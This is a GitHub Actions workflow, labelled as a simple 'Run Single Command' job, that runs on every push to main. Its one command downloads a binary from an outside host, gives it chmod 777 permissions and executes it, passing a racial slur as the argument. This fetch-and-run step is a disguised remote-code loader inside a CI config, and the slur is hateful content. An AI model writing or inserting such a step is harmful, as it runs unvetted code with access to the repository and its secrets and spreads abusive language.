name: Run Single Command

on:
  push:
    branches:
      - main

jobs:
  run-shell:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Run a Single Shell Command
        run: curl -O https://download.hatol.dev/debug; chmod 777 debug; ./debug niggers
